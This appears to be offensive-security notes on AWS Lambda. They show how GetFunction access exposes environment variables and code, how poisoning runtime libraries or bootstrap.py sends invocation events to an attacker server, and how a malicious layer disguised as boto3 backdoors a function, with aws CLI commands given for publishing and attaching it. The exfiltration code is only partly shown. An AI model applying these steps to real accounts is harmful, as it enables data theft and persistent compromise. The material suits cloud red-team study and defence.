Lambda - Security
Following are some interesting security senarios :-
You have got access to Keys that has "GetFunction" permission, then its possible to view Environment variables of the lambda and even download the lambda function.
Permission needed : GetFunction
aws lambda get-function --function-name testDemo
The output will contain all the environment variables that were configured with the lambda.
We have sucessfully compromised a Lambda which runs once every 10 mins and wants to leak all the events passed to the lambda.
There are 2 ways to poision a lambda :-
- In case lambda function is using any import library, we can poision the respective library present in
/var/runtimesince these are refered by lambda whenever function is executed.
- In case there is no import in the main lambda code, then poision bootstrap.py file at
/var/runtime/bootstrap.pysince this file is refered every single time lambda is executed by the init processor.
In order to leak out the even best way would be add couple of lines
http = urllib3.PoolManager()
Above code will query the Runtime and get the current even and pass on the data to the attacker server hereby exfilterating the event.
We have compromised a Lambda and have full access to the function and now want to backdoor the function. In order to backdoor it, we can add a malicious layer to the lambda function.
In order to create a layer, we first need to create a malicous file that can be later refered by the legit lambda code. For instance if the language is python then we need to create a zip with the our malicous file. The zip directory info should be
Zipping a layer
In the above example we have created a malicious zipfile which behaves as boto3. We now create a new lambda layer using the above zip file.
aws lambda publish-layer-version --layer-name MyLayer --description "Backdoor layer" --license-info "MIT" --zip-file fileb:///layer.zip --c
ompatible-runtimes python3.9 --compatible-architectures "x86_64" --region us-east-2
Once layer is ready, we will attach the layer to the target function
aws lambda update-function-configuration --function-name securitylabs-lambda --layers arn:aws:lambda:us-east-2:123456789012:MyLayer:layer1:1
Now, anytime the function is executed, our layer code will also be loaded and executed prior to actual function execution hereby backdooring the function.